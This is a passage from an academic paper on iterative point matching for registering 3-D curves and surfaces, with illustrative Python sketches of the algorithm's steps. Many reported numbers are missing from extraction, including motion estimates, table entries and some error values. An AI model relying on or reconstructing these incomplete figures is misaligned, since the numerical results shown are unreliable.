For example, in the situation illustrated in Figure 1, our algorithm will converge to a local minimum. In this case, other methods based on more global criteria, such as those cited in the introduction section, could be used to recover a rough estimate of the motion. The algorithm described in this paper can then be used to obtain a precise motion estimate.

3 Iterative Pseudo Point Matching Algorithm

We describe in this section an iterative algorithm for 3-D shape registration by matching points in the first frame, after applying the previously recovered motion estimate (R, t), with their closest points in the second. A least-squares estimation reduces the average distance between the matched points in the two frames. As a point in one frame and its closest point in the other do not necessarily correspond to a single point in space, several iterations are indispensable. Hence the name of the algorithm.

3.1 Finding Closest Points

Let us first define the distance d(x, 𝒮') between point x and shape 𝒮', which is used in Equation 2. By definition, we have

\[ d(\mathbf{x}, \mathcal{S}') = \min_{\mathbf{x}' \in \mathcal{S}'} d(\mathbf{x}, \mathbf{x}'), \tag{3} \]

where d(x_1, x_2) is the Euclidean distance between the two points x_1 and x_2, i.e., d(x_1, x_2) = ‖x_1 − x_2‖. In our case, 𝒮' is available as a set of points x'_j (j = 1, ..., n). We use the following simplification:

\[ d(\mathbf{x}, \mathcal{S}') = \min_{j \in \{1, \ldots, n\}} d(\mathbf{x}, \mathbf{x}'_j). \tag{4} \]

See Section 7.4 for more discussions on the distance. The closest point y in the second frame to a given point x is the one satisfying

\[ d(\mathbf{x}, \mathbf{y}) \le d(\mathbf{x}, \mathbf{z}), \quad \forall \mathbf{z} \in \mathcal{S}'. \]

The worst-case cost of finding the closest point is O(n), where n is the number of points in the second frame. The total cost while performing the above computation for each point in the first frame is O(mn), where m is the number of points in the first frame. There are several methods which can considerably speed up the search process, including bucketing techniques and k-d trees (abbreviation for k-dimensional binary search tree) (Preparata and Shamos 1986).
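The closest-point definition of Equation 4 amounts to a nearest-neighbor query. A brute-force sketch in Python (illustrative only; the paper uses k-d trees precisely to avoid this O(mn) cost) could read:

```python
import math

def closest_point(x, points):
    """Return the point in `points` minimizing the Euclidean distance to x.

    Brute force: O(n) per query, hence O(mn) over the whole first frame,
    which is the cost a k-d tree or bucketing scheme reduces.
    """
    return min(points, key=lambda p: math.dist(x, p))

# Example: the closest point of a small "second frame" to the origin.
frame2 = [(1.0, 0.0, 0.0), (5.0, 0.0, 0.0), (0.0, 2.0, 0.0)]
print(closest_point((0.0, 0.0, 0.0), frame2))
```

Swapping this function for a k-d tree query changes only the lookup, not the rest of the iteration.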
k-d trees are implemented in our algorithm; see Appendix A of this article for the details.

3.2 Pseudo Point Matching

For each point x we can always find a closest point y. However, because there are some spurious points in both frames due to sensor error, or because some points visible in one frame are not in the other due to sensor or object motion, it probably does not make any sense to pair x with y. Many constraints can be imposed to remove such spurious pairings. For example, distance continuity in a neighborhood, which is similar to the figural continuity in stereo matching (Mayhew and Frisby 1981; Pollard et al. 1985; Grimson 1985), should be very useful to discard the false matches.

Fig. 1. Our algorithm exploits a local matching technique, and converges to the closest local minimum, which is not necessarily the optimal one.

These constraints are not incorporated in our algorithm in order to maintain the algorithm in its simplest form. Instead, we can exploit the following two simple heuristics, which are all unary.

The first is the maximum tolerance for distance. If the distance between a point x_i and its closest one y_i, denoted by d(x_i, y_i), is bigger than the maximum tolerable distance D_max, then we set p_i = 0 in Equation 2, i.e., we cannot pair a reasonable point in the second frame with the point x_i. This constraint is easily justified since we know that the motion between the two frames is small, and hence the distance between two points reasonably paired cannot be very big. In our algorithm, D_max is set adaptively and in a robust manner during each iteration by analyzing distance statistics. See Section 3.3.

The second is the orientation consistency. We can estimate the surface normal or the curve tangent (both referred to below as the orientation vector) at each point.
It can be easily shown that the angle between the orientation vector at a point x and that at its corresponding point y in the second frame cannot exceed the rotation angle between the two frames (Zhang et al. 1988). Therefore, we can impose that the angle between the orientation vectors at two paired points should not be bigger than a prefixed value, which is the maximum of the rotation angle expected between the two frames. This constraint is not implemented for surface registration, because the computation of the surface normals from 3-D scattered points is relatively expensive. For curves, we compute an approximate tangent for each point from the vector linking its neighboring points (Zhang 1992b; Zhang 1992a). It is the only place where the property that points of a curve are chained is used. In our implementation, we set this angle threshold to 60° to take into account the noise effect in the tangent computation. If the tangents can be precisely computed, it can be set to a smaller value. This constraint is especially useful when the motion is relatively big.

3.3 Updating the Matching

Instead of using all matches recovered so far, we exploit a robust technique to discard several of them by analyzing the statistics of the distances. The basic idea is that the distances between reasonably paired points should not be very different from each other. To this end, one parameter, denoted by 𝒟, needs to be set by the user, which indicates when the registration between two frames is good. See Section 4.1 for the choice of the value of 𝒟.

Let D_max^I denote the maximum tolerable distance in iteration I. At this point, each point in the first frame (after applying the previously recovered motion) whose distance to its closest point is less than D_max^{I−1} is retained, together with its closest point and their distance.
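The two unary heuristics of Section 3.2 might be sketched as follows; the function name and the brute-force search are ours, and the tangents are assumed to be unit vectors:

```python
import math

def pair_points(frame1, tangents1, frame2, tangents2, d_max, angle_max_deg=60.0):
    """Pair each first-frame point with its closest second-frame point,
    keeping only pairs that pass the two unary tests of Section 3.2."""
    cos_min = math.cos(math.radians(angle_max_deg))
    pairs = []
    for x, tx in zip(frame1, tangents1):
        # closest point by brute force (a k-d tree is used in the article)
        j = min(range(len(frame2)), key=lambda k: math.dist(x, frame2[k]))
        y, ty = frame2[j], tangents2[j]
        if math.dist(x, y) > d_max:
            continue                 # maximum tolerance for distance
        # orientation consistency; abs() ignores the tangent sign ambiguity
        cos_angle = abs(sum(a * b for a, b in zip(tx, ty)))
        if cos_angle < cos_min:
            continue
        pairs.append((x, y))
    return pairs
```

For surfaces, the orientation test would simply be skipped, as in the article.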
Let {x_i}, {y_i}, and {d_i} be, respectively, the resulting sets of original points, closest points, and their distances after the pseudo point matching, and let N be the cardinality of the sets. Now compute the mean μ and the sample deviation σ of the distances, which are given by

μ = (1/N) Σ_{i=1}^N d_i,   σ = sqrt((1/N) Σ_{i=1}^N (d_i − μ)²).

Depending on the value of μ, we adaptively set the maximum tolerable distance D_max^I as shown below:

if μ < 𝒟 /* the registration is quite good */
    D_max^I = μ + 3σ;
else if μ < 3𝒟 /* the registration is still good */
    D_max^I = μ + 2σ;
else if μ < 6𝒟 /* the registration is not too bad */
    D_max^I = μ + σ;
else /* the registration is really bad */
    D_max^I = ξ;
end if

The explanation of ξ is deferred to Section 4.2.

3.4 Computing Motion

At this point, we have a set of 3-D points which have been reasonably paired with a set of closest points, denoted respectively by {x_i} and {y_i}. Let N be the number of pairs. Because N is usually much greater than 3 (three points are the minimum for the computed rigid motion to be unique), it is necessary to devise a procedure for computing the motion by minimizing the following mean-squares objective function

F(R, t) = (1/N) Σ_{i=1}^N ||R x_i + t − y_i||²,   (5)

which is the direct result of Equation 2 with the definition of distance given by Equation 4. Any optimization method, such as steepest descent, conjugate gradient, or simplex, can be used to find the least-squares rotation and translation. Fortunately, several much more efficient algorithms exist for solving this particular problem. They include the quaternion method (Faugeras and Hebert 1986; Horn 1987), singular value decomposition (Arun et al. 1987), the dual number quaternion method (Walker et al. 1991), and the method proposed by Brockett (1989). We have implemented both the quaternion method and the dual number quaternion one. They yield exactly the same motion estimate.
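The statistics-based threshold of Section 3.3 can be transcribed directly (the function name and argument conventions are ours):

```python
import math

def update_dmax(distances, D, xi):
    """Compute D_max^I from the mean and sample deviation of the current
    pairing distances, following the rule of Section 3.3.  D is the
    user-supplied registration-quality parameter (script D); xi is the
    valley-based fallback of Section 4.2."""
    n = len(distances)
    mu = sum(distances) / n
    sigma = math.sqrt(sum((d - mu) ** 2 for d in distances) / n)
    if mu < D:            # the registration is quite good
        return mu + 3 * sigma
    elif mu < 3 * D:      # the registration is still good
        return mu + 2 * sigma
    elif mu < 6 * D:      # the registration is not too bad
        return mu + sigma
    else:                 # the registration is really bad
        return xi
```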
For completeness, the dual quaternion method (Walker et al. 1991) is summarized in Appendix B.

Fig. 2. A histogram of distances

At this point, we use the newly set D_max^I to update the matching previously recovered: a pairing between x_i and y_i is removed if their distance d_i is bigger than D_max^I. The remaining pairings are used to compute the motion between the two frames, as will be described below. Because D_max is adaptively set based on the statistics of the distances, our algorithm is rather robust to relatively big motion and to gross outliers (as shown in the experiment section). Even if there remain several false matches in the retained set after the update, the use of the least-squares technique still yields a reasonable motion estimate, which is sufficient for the algorithm to converge to the correct solution.

3.5 Summary

We can now summarize the iterative pseudo point matching algorithm as follows:

input: Two 3-D frames containing m and n 3-D points, respectively.
output: The optimal motion between the two frames.
procedure:
1. initialization
   D_max^0 is set to 20𝒟, which implies that every point in the first frame whose distance to its closest point in the second frame is bigger than D_max^0 is discarded from consideration during the first iteration. The number 20 is not crucial in the algorithm, and can be replaced by a larger one.
2. preprocessing
   (a) Compute the tangent at each point of the two frames (only for curves).
   (b) Build the k-d tree representation of the second frame.
3. iteration until convergence of the computed motion
   (a) Find the closest points satisfying the distance and orientation constraints, as described in Section 3.2.
   (b) Update the recovered matches through statistical analysis of distances, as described in Section 3.3.
   (c) Compute the motion between the two frames from the updated matches, as described in Section 3.4.
   (d) Apply the motion to all points (and their tangents for curves) in the first frame.

Several remarks should be made here.
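Under simplifying assumptions (brute-force closest points instead of a k-d tree, a fixed distance threshold instead of the adaptive one, no orientation test), steps 3(a)-(d) might be sketched as follows; `rigid_motion` uses the SVD method of Arun et al. (1987) rather than the quaternion methods of the article, and all names are ours:

```python
import numpy as np

def rigid_motion(X, Y):
    """Least-squares (R, t) minimising Equation (5), by the SVD method
    of Arun et al. (1987)."""
    cx, cy = X.mean(axis=0), Y.mean(axis=0)
    H = (X - cx).T @ (Y - cy)            # 3x3 correlation of centred points
    U, _, Vt = np.linalg.svd(H)
    R = Vt.T @ U.T
    if np.linalg.det(R) < 0:             # guard against a reflection
        Vt[-1] *= -1
        R = Vt.T @ U.T
    return R, cy - R @ cx

def register(P, Q, d_max, n_iter=40):
    """Iterative pseudo point matching (steps 3a-3d of the summary)."""
    R, t = np.eye(3), np.zeros(3)
    P_cur = P.copy()
    for _ in range(n_iter):
        # 3(a) closest points in the second frame (brute force)
        d2 = ((P_cur[:, None, :] - Q[None, :, :]) ** 2).sum(-1)
        j = d2.argmin(axis=1)
        # 3(b) discard pairings beyond the distance threshold (simplified)
        keep = d2[np.arange(len(P_cur)), j] < d_max ** 2
        if keep.sum() < 3:
            break
        # 3(c) motion between the ORIGINAL first frame and the second frame
        R, t = rigid_motion(P[keep], Q[j[keep]])
        # 3(d) apply the motion to all points of the first frame
        P_cur = P @ R.T + t
    return R, t
```

Note that, as in the article, the motion is always recomputed from the original first-frame points, so the returned (R, t) directly relates the original two frames.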
First, the construction and the use of k-d trees for finding closest points are explained in Appendix A. Second, the motion is computed between the original points in the first frame and the points in the second frame. Therefore, the final motion given by the algorithm represents the transformation between the original first frame and the second frame. Last, the iteration-termination condition is defined by the change in the motion estimate between two successive iterations. The change in translation at iteration I is defined as δt = ||t_I − t_{I−1}|| / ||t_I||. To measure the change in rotation, we use the rotation axis representation, which is a 3-D vector, denoted by r. Let θ = ||r|| and n = r/||r||; the relation between r and the quaternion q is q = [sin(θ/2) nᵀ, cos(θ/2)]ᵀ. We do not use the quaternions because their difference does not make much sense. We then define the change in rotation at iteration I as δr = ||r_I − r_{I−1}|| / ||r_I||. We terminate the iteration when both δr and δt are less than 1%, or when the number of iterations reaches a prefixed threshold (20 for curves and 40 for surfaces). One could also define the termination condition as the absolute change, i.e., δr = ||r_I − r_{I−1}|| and δt = ||t_I − t_{I−1}||. We would then stop the iteration if δr is less than a threshold, say 0.5 degrees, and δt is less than a threshold, say 0.5 centimeters.

4 Practical Considerations

In this section, we consider several important aspects in practice, including the choice of the parameters 𝒟 and ξ, and the coarse-to-fine strategy.

4.1 Choice of the Parameter 𝒟

The only parameter that needs to be supplied by the user is 𝒟, which indicates when the registration between two frames can be considered to be good. In other words, the value of 𝒟 should correspond to the expected average distance when the registration is good. When the motion is big, 𝒟 should not be very small.
Because we set D_max^0 = 20𝒟, if 𝒟 is very small we cannot find any matches in the first iteration and of course we cannot improve the motion estimate. (A solution to this is to set D_max^0 bigger, say 30𝒟.) In practice, if we know the precision of the initial estimate, say, within 20 centimeters, we can set D_max^0 to that value. The value of 𝒟 has an impact on the convergence of the algorithm. If 𝒟 is smaller than necessary, then more iterations are required for the algorithm to converge because many good matches will be discarded at the step of matching update. On the other hand, if 𝒟 is much bigger than necessary, it is possible for the algorithm not to converge to the correct solution because possibly many false matches will not be discarded. Thus, to be prudent, it is better to choose a small value for 𝒟. In our implementation, we relate 𝒟 to the resolution of the data. Let D̄ be the average distance between neighboring points in the second frame. Consider the perfect registration shown in Figure 3. Points from the first frame are marked by a cross and those from the second, by a dot. Assume that a cross is located in the middle of two dots. Then in this case, the mean μ of the distances between the two sets of points is equal to D̄/2. In general, we can expect μ ≥ D̄/2. So, if D̄ is computed, we can set 𝒟 = D̄. For curves, we do compute D̄ for each run. For surfaces, 𝒟 is set to 10 centimeters, which corresponds roughly to twice the resolution of a 3-D map reconstructed by a correlation-based stereo for a depth range of about 10 meters. This gives us satisfactory results.

Fig. 3. Illustration of a perfect registration to show how to choose 𝒟

4.2 Choice of the Parameter ξ

In Section 3.3, we described how to update matches through a statistical analysis of distances, and we have assumed that the distribution of distances is approximately Gaussian when the registration between two frames is good.
Because of the local property of the matching criterion used, our algorithm converges to the closest minimum. It is thus best applied in situations where the motion is small or approximately known and a precise estimate of the motion is required. In the case of a very bad initial estimate of the motion between two frames, one observes that the form of the distribution of distances is in general very complex. We show in Figure 4 one such typical histogram. As can be observed, the form of the histogram in Figure 4 is irregular. There are several peaks. Furthermore, many points are found near zero. This shows the difficulty of our approach. When the initial estimate is very bad, we probably find matches having small distances due to occasionally bad alignments; that is, these matches are in fact not reasonable. We cannot guarantee that our algorithm yields the correct estimate of the motion. One possible method is to generate a hypothesis for each peak, and then evaluate each hypothesis in parallel. The criterion for measuring the quality of a hypothesis can be a function of the number of matches and of the final average distance. In the end, the hypothesis which gives the best score is retained as the transformation between the two frames. We have adopted a simpler method. The maximal peak gives in general, at least we expect, a hint of a reasonable correspondence between the two frames.

Fig. 4. Histogram of distances when the initial estimate of the motion is very bad

Fig. 5. How to choose the value of ξ

We have chosen in our implementation the valley after the maximal peak as the value of ξ (see Figure 5). That is, all matches after the valley are discarded from consideration. To avoid noise perturbation, we impose that the number of points at the valley must not go beyond 60% of the number of points at the peak. In all our experiments, this method provides us with satisfactory results, as shown below.
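One way to realize this valley-after-peak selection (a sketch; the histogram representation and the names are ours):

```python
def choose_xi(hist, bin_width, peak_ratio=0.6):
    """Return xi as the centre of the first valley bin after the maximal
    peak of the distance histogram.  A bin counts as the valley only if
    its count has dropped below peak_ratio of the peak count (the 60%
    rule) and the next bin does not decrease further."""
    peak = max(range(len(hist)), key=lambda i: hist[i])
    for i in range(peak + 1, len(hist) - 1):
        if hist[i] < peak_ratio * hist[peak] and hist[i] <= hist[i + 1]:
            return (i + 0.5) * bin_width
    return len(hist) * bin_width         # no valley found: keep everything
```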
4.3 Coarse-to-Fine Strategy

As shown in the next section, the algorithm converges quickly during the first few iterations and slows down as it approaches the local minimum. We find also that more search time is required during the first few iterations because the search space is larger at the beginning. Since the total search time is linear in the number of points in the first frame, it is natural to exploit a coarse-to-fine strategy. During the first few iterations, we can use coarser samples (e.g., every five) instead of all sample points on the curve. When the algorithm almost converges, we use all available points in order to obtain a precise estimate.

5 Experimental Results with Curves

The proposed algorithm has been implemented in C. In order to maintain the modularity, the code is not optimized. The program is run on a SUN 4/60 workstation, and any quoted times are given for execution on that machine. This section is divided into three subsections. In the first, the algorithm is applied to synthetic data. The results show clearly the typical behavior of the algorithm to be expected in practice. The second describes the robustness and efficiency of the algorithm using synthetic data with different levels of noise and different samplings. The third describes the experimental results with real data.

5.1 A Case Study

In this experiment, the parametric curve described by x(u) = [u², 5u sin(u) + 10u cos(1.5u), 0]ᵀ is used. The curve is sampled twice in different ways. Each sample set contains 200 points. The second set is then rotated and translated with r = [0.02, 0.25, −0.15]ᵀ and t = [40.0, 120.0, −50.0]ᵀ. We thus get two noise-free frames. (The same noise-free data are used in the experiments described in the next section.) For each point, zero-mean Gaussian noise with a standard deviation equal to 2 is added to its x, y and z components.
We show in Figure 6 the front and top views of the noisy data. For visual convenience, points are linked. The solid curve is the one in the first frame, and the dashed one, in the second frame. The data are used as is; no smoothing is performed. The first step is then to find matches for the points in the first frame. As D_max^0 is big, each point has a match. We find 200 matches in total, which are shown in Figure 7, where matched points are linked. Many false matches are observed. We then update these matches using the technique described in Section 3.3, and 100 matches survive, which are shown in Figure 8. Even after the updating, there are still some false matches. Because there are more good matches than false matches, the motion estimation algorithm still yields a reasonable estimate. This can be observed in Figure 9, where the estimated motion has been applied to the points in the first frame. We can observe the improvement of the registration of the two curves, especially in the top view. Now we enter the second iteration. We find at this time 176 matches, which are shown in Figure 10a. (The top view is not shown, because the two curves are very close.) Several false matches are observable. After updating, 146 matches remain, as shown in Figure 10b. Almost all these matches are correct. The motion is then computed from these matches. We iterate the process in the same manner. The motion result after 10 iterations is shown in Figure 11. The registration between the two curves is already quite good. After 15 iterations, the algorithm yields the following motion estimate:

r̂ = [2.442 × 10⁻², … × 10⁻¹, … × 10⁻¹]ᵀ,   t̂ = [3.879 × 10¹, … × 10², … × 10¹]ᵀ.

To measure the precision of the motion estimate, we define the rotation error as

e_r = ||r − r̂|| / ||r|| × 100%,   (6)

where r and r̂ are respectively the real and estimated rotation parameters, and the translation error as

e_t = ||t − t̂|| / ||t|| × 100%,   (7)

where t is the real translation parameter and t̂ is the estimated one.
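These two error measures translate directly into code (a trivial sketch; the names are ours):

```python
def motion_errors(r_true, r_est, t_true, t_est):
    """Relative rotation and translation errors of Equations (6) and (7),
    both returned in percent."""
    def norm(v):
        return sum(c * c for c in v) ** 0.5
    def diff(a, b):
        return [p - q for p, q in zip(a, b)]
    e_r = norm(diff(r_true, r_est)) / norm(r_true) * 100.0
    e_t = norm(diff(t_true, t_est)) / norm(t_true) * 100.0
    return e_r, e_t
```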
In Figure 12, we show the evolution of the rotation and translation errors versus the number of iterations. Fast convergence is observed during the first few iterations, and relatively slower convergence later. After 15 iterations, the rotation error is 1.6% and the translation error is 4.6%. The total execution time is 6.5 seconds in this experiment.

Fig. 6. Front and top views of the data
Fig. 7. Matched points in the first iteration before updating (front and top views)
Fig. 8. Matched points in the first iteration after updating (front and top views)
Fig. 9. Front and top views of the motion result after the first iteration
Fig. 10. Matched points (a) before and (b) after updating in the second iteration (only the front view)
Fig. 11. Front and top views of the motion result after ten iterations
Fig. 12. Evolution of the rotation and translation errors versus the number of iterations

We show in Table 1 several intermediate results during different iterations. The results are divided into three parts. The second to fourth rows indicate the execution time (in seconds) required for finding matches, updating the matching, and computing the motion, respectively. The fifth row shows the values of D_max used in different iterations. The last row shows the comparison of the numbers of matches found in different iterations before and after updating. We have the following remarks:

- D_max decreases almost monotonically with the number of iterations. This is because the registration becomes better and better, and D_max is computed dynamically through the statistical analysis of distances.
- The time required for finding matches also decreases almost monotonically, because of the almost monotonic decrease of D_max: less search in the k-d tree is required when the search region becomes smaller.
- The time required for updating the matching is negligible.
- The time required for computing the motion is almost constant, as it is related to the number of matches (here almost constant). Furthermore, the motion algorithm is very efficient: about 0.05 seconds for 145 matches.
- The numbers of matches before and after updating do not vary much after the first few iterations. This also implies that the Gaussian assumption of the distance distribution is reasonable.

5.2 Synthetic Data

In this section, we describe the robustness and efficiency of the algorithm using the same synthetic data as in the last section, but with different levels of noise and different samplings. All results given below are the average of ten tries. The first series of experiments is carried out with respect to different levels of noise. The standard deviation of the noise added to each point varies from 0 to 20. Similar to Figure 12, we show, as a sample, in Figure 13 and Figure 14 the evolutions of the rotation and translation errors versus the number of iterations with a standard deviation equal to 2 and 8. From these results, we observe that:

- The translation error decreases almost monotonically, while the behavior of the rotation error is more complex.
- Noise has a stronger impact on the rotation parameters than on the translation parameters.
- When noise is small, there is in general a smaller error in rotation than in translation. When noise is significant, the inverse is observed.

Fig. 13. Evolution of the rotation and translation errors versus the number of iterations with a standard deviation equal to 2
Table 1. Several detailed results in different iterations

iteration:              1  2  3  …  10  11
matching time (s):      …
update time (s):        …
motion time (s):        …
D_max:                  …
matches before/after:   …

Fig. 14. Evolution of the rotation and translation errors versus the number of iterations with a standard deviation equal to 8

We think the above phenomena are due to the fact that the relation between the measurements and the rotation parameters is nonlinear, while that between the measurements and the translation parameters is linear. To visually demonstrate the effect of the added noise and the ability of the algorithm, we show in Figure 15 and Figure 16 two sample results. In each figure, the upper row displays the front and top views of the two noisy curves before registration; the lower row displays the front and top views of the two noisy curves after registration. In Figure 15 and Figure 16, we have added, to the x, y, and z components of each point of the two curves, zero-mean Gaussian noise with a standard deviation equal to 8 and 16, respectively. Even though the curves are so noisy, the registration between them is surprisingly good.

We now summarize more results in Table 2. The rotation and translation errors are measured in percent, and the execution time in seconds. Each number shown is the average of 10 tries; 15 iterations have been applied. We have the following conclusions:

- The errors in rotation and in translation increase with the noise added to the data, as expected.
- Noise in the measurements has more effect on the rotation than on the translation.
- The algorithm is robust to noise. It yields a reasonable motion estimate even when the data are significantly corrupted.
- The execution time also increases with the noise added to the data.
This is because when the data are very noisy the value of D_max stays big, and the search has to be performed in a large space. We now investigate the ability of the algorithm with respect to different samplings of curves. The same data are used. Zero-mean Gaussian noise with a standard deviation equal to 2 is added to the x, y, and z components of each point of the two curves. We will describe in Section 7.4 the effect of different samplings of the curves in the second frame. Here we vary the sampling of the curve in the first frame from 1 (i.e., all points) to 10 (i.e., one out of every ten points). Ten tries are carried out for each sampling. The errors in rotation and in translation (in percent), and the execution time (in seconds), versus the different samplings are shown in Table 3. Two remarks can be made:

- Generally speaking, the more samples there are in a curve, the smaller the error in the estimation of the rotation and translation. However, the exact relation is not very clear. Compare sampling = 1 and sampling = 10: the latter has only 20 points while the former has 200 points, yet the motion error is only twice as large.
- The execution time decreases monotonically as the number of sample points decreases. Disregarding the preprocessing time, the execution time is linear in the number of points in the first frame.

Fig. 15. Front and top views of two noisy curves with a standard deviation equal to 8 before and after registration

Table 2. A summary of the experimental results with synthetic data

standard deviation:  …
rotation error:      …
translation error:   …
execution time:      …

In the foregoing discussions we have observed that using coarsely sampled points of the curves in the first frame does not affect too much the accuracy of the final motion estimate, but it considerably speeds up the whole process. It is natural to think about using a coarse-to-fine strategy such as that described in Section 4.3.
The finding of fast convergence of the algorithm during the first few iterations (see Figure 13 and Figure 14) and the finding of relatively expensive search (see Table 1) justify the following strategy. During the first few iterations, we use coarser, instead of all, sample points, which allows for finding an estimate close to the optimal. We then use all sample points to refine this estimate. We have conducted ten experiments using the same data as before by adding zero-mean Gaussian noise with a standard deviation equal to 3. During the first five iterations, only 40 points (one out of every five points) are used. These are followed by ten iterations using all points. The average results of the ten experiments are: rotation error = 4.56%, translation error = 4.29%, and execution time = 3.39 s. For comparison, we performed 15 iterations using all points. The average results of the ten tries are: rotation error = 4.68%, translation error = 4.14%, and execution time = 7.49 s. Only a little difference between the final motion estimates is observed, but the algorithm is more than twice as fast when exploiting the coarse-to-fine strategy.

Fig. 16. Front and top views of two noisy curves with a standard deviation equal to 16 before and after registration

Table 3. Results with respect to different samplings

fraction of points:  1  1/2  1/3  1/4  1/5  1/6  1/7  1/8  1/9  1/10
rotation error:      …
translation error:   …
execution time:      …

5.3 Real Data

In this section, we provide an example with real data. A trinocular stereo system mounted on our mobile vehicle is used to take images of a chair scene (the scene is static but the robot moves). We show in Figure 17 two images taken by the first camera from two different positions. The displacement between the two positions is about 4 degrees in rotation and 100 millimeters in translation. The chair is about 3 meters from the mobile vehicle.
The curve-based trinocular stereo algorithm developed in our laboratory (Robert and Faugeras 1991) is used to reconstruct the 3-D frames corresponding to the two positions. There are 36 curves and 588 points in the first frame, and 48 curves and 763 points in the second frame. We show in the upper row of Figure 18 the front view and the top view of the superposition of the two 3-D frames. The curves in the first frame are displayed in solid lines, while those in the second frame are in dashed lines.

Fig. 17. Images of a chair scene taken by the first camera from two different positions
Fig. 18. Superposition of two 3-D frames before and after registration: front and top views

We apply the algorithm to the two frames. The algorithm converges after 12 iterations. It takes in total 32.5 seconds on a SUN 4/60 workstation, and half of the time is spent in the first iteration (so we could speed up the process by setting D_max^0 to a smaller value). The final motion estimate is

r̂ = [… × 10⁻³, … × 10⁻², … × 10⁻³]ᵀ,   t̂ = [… × 10, … × 10, … × 10²]ᵀ,

where r is in radians and t is in centimeters. The motion change is: δr = 0.78% and δt = 0.53%. The result is shown in the lower row of Figure 18, where we have applied the estimated motion to the first frame. Excellent registration is observed for the chair. The registration of the border of the wall is a little bit worse because more error has been introduced during the 3-D reconstruction, for it is far away from the cameras.

Now we exploit the coarse-to-fine strategy. As before, we do coarse matching in the first five iterations by sampling evenly one out of every five points on the curves in the first frame, followed by fine matching using all points. The algorithm converges after 12 iterations and yields exactly the same motion estimate as when only doing fine matching. The execution time, however, decreases from 32.5 seconds to 10.5 seconds, about three times faster. If we now sample evenly one out of every ten points on the curves in the first frame, and do coarse matching in the first five iterations and fine matching in the subsequent ones, the algorithm converges after 13 iterations (one iteration more), and the final motion estimate is

r̂ = [… × 10⁻³, … × 10⁻², … × 10⁻³]ᵀ,   t̂ = [… × 10, … × 10, … × 10²]ᵀ,

which is almost the same as the one estimated using directly all points. The motion change is: δr = …% and δt = 0.50%. The execution time is now 8.8 seconds.

6 Experimental Results with Surfaces

We provide in this section two examples. In the first example, two 3-D frames of a rock scene are reconstructed by a correlation-based stereovision system. They are first registered manually. Then we want to see the limit of our algorithm by using different initial estimates. The second example shows the registration of two range images of a head figure.

6.1 A Rock Scene

We show in Figure 19 and Figure 20 two triplets of images of a rock scene. The stereo rig is about 6 meters from the scene. The two positions differ by 30 degrees in rotation and 3.75 meters in translation. The correlation-based stereo system reconstructs … points for the first position and … points for the second position.

Fig. 19. The first triplet of images of a rock scene
Fig. 20. The second triplet of images of a rock scene

For experimental purposes, we have taken two similar triplets of images having marks put on the rocks. From these marks, we are able to manually compute the displacement between the two positions. This result is shown in Figure 21 (see color figure section), where the first map is drawn in quadrangles, and the second in grayed surface. The registration is reasonable. One can observe that many points are only visible from one position.
In the sequel, we vary the initial motion estimate, run our algorithm on the two frames, and then compare the results obtained by our algorithm with the result obtained manually. Note that the two frames are now expressed in the same coordinate system by applying the manual estimate to the first frame. Thus, the final estimate of the displacement between the two frames is expected to be zero, and the estimate given by the algorithm is directly the motion error with respect to the manual estimate. We have done several tests, and three of them are shown in the following. The initial estimate will be represented by a 6-vector: the first three elements constitute the r vector, and the last three, the t vector. We first set the initial estimate to [0.0, 0.0, 0.35, 0.5, −2.0, 0.2]ᵀ (i.e., a rotation of 20 degrees and a translation of 2.07 meters). The difference between the two frames corresponding to this estimate is shown in Figure 22 (see color figure section). After 40 iterations, the motion estimate given by our algorithm is [… × 10⁻³, … × 10⁻², … × 10⁻³, … × 10⁻², … × 10⁻², … × 10⁻²]ᵀ. Thus, there is a difference of 0.86 degrees in rotation and 5.66 centimeters in translation from the manual estimate. The result after the registration is shown in Figure 23 (see color figure section). We see that even when the initial estimate is very different from the real one, we still obtain satisfactory results. After several more iterations, we obtain a better result. What happens if we increase further the difference between the initial and final estimates? The initial estimate in this test is [0.0, 0.0, 0.35, −0.5, −2.5, 0.2]ᵀ (i.e., a rotation of 20 degrees and a translation of 2.56 meters). The difference between the two frames corresponding to this estimate is shown in Figure 24 (see color figure section). After 40 iterations, the motion estimate given by our algorithm is [… × 10⁻², … × 10⁻², … × 10⁻¹, … × 10⁻¹, … × 10, … × 10⁻¹]ᵀ.
The result is mediocre, as shown in Figure 25 (see color figure section), but it is better than the initial estimate. If we continue, the result shows some further improvement. After 80 iterations, the motion estimate is [… × 10⁻², … × 10⁻³, … × 10⁻³, … × 10⁻², … × 10⁻², … × 10⁻²]ᵀ. The difference with the manual estimate is 0.92 degrees in rotation and 6.18 centimeters in translation, which is reasonably small, as shown in Figure 26 (see color figure section). Up to now, the tests we have carried out are all with a rotation around an axis perpendicular to the ground plane. What happens if the vehicle is found on two different slopes (e.g., the vehicle scrambles over a pile of rocks)? Here is an example. The initial estimate is [0.35, 0.0, 0.17, −0.5, −2.5, 0.2]ᵀ. Thus, there is a rotation of 20 degrees with respect to the ground plane, and a rotation of 10 degrees around an axis perpendicular to the ground plane. The translation between the two views is 2.56 meters. The difference between the two frames corresponding to this estimate is shown in Figure 27 (see color figure section). After 40 iterations, the motion estimate is [… × 10⁻², … × 10⁻⁴, … × 10⁻³, … × 10⁻³, … × 10⁻², … × 10⁻³]ᵀ. The difference with the manual estimate is 0.65 degrees in rotation and 2.87 centimeters in translation. The registration result is quite good, as shown in Figure 28 (see color figure section).

6.2 A Head Figure

The proposed algorithm is used by Chen for range image registration (Chen 1992). One modification he has made concerns the closest point search procedure: he uses the technique proposed by Chen and Medioni (1992) (see Section 8). One example is shown in this section. Figure 29a and Figure 29d show two range images of a head figure. For display purposes, they are shown in shaded intensity image form.
The coordinate system is defined as follows: the origin is at the center of the image, the x-axis is parallel to the columns of the images (unit in pixels), the y-axis is parallel to the rows (unit in pixels), and the z-axis points out of the paper (unit in grey levels). The two images differ by [ , 0, 0, 0, 0, 0]^T. Instead of using all points, about 150 points on a regular grid are chosen from the first image, shown in Figure 29a as small circles overlaid on the original image.

Iterative Point Matching for Registration of Free-Form Curves and Surfaces 137

Fig. 29. A head figure. (a) First view; (b) Result after one iteration; (c) Result after five iterations; (d) Result after 39 iterations

The initial motion estimate is [0.0873, 0, 0, 0, 0, 0]^T, i.e., a difference of 15 degrees in rotation from the real transformation. The result after one iteration is shown in Figure 29b, where the points from the first image after transformation (shown as circles) are projected onto the second image. The result is very bad. After five iterations, the estimated transformation is already reasonable, as shown in Figure 29c. The algorithm converges after 39 iterations, yielding the result shown in Figure 29d. The corresponding motion estimate is [ , , .0008, , , ]^T. The error is less than 0.3 degrees in rotation and 0.2 pixels in translation.

138 Zhang

7 Discussions

7.1 About Complexity

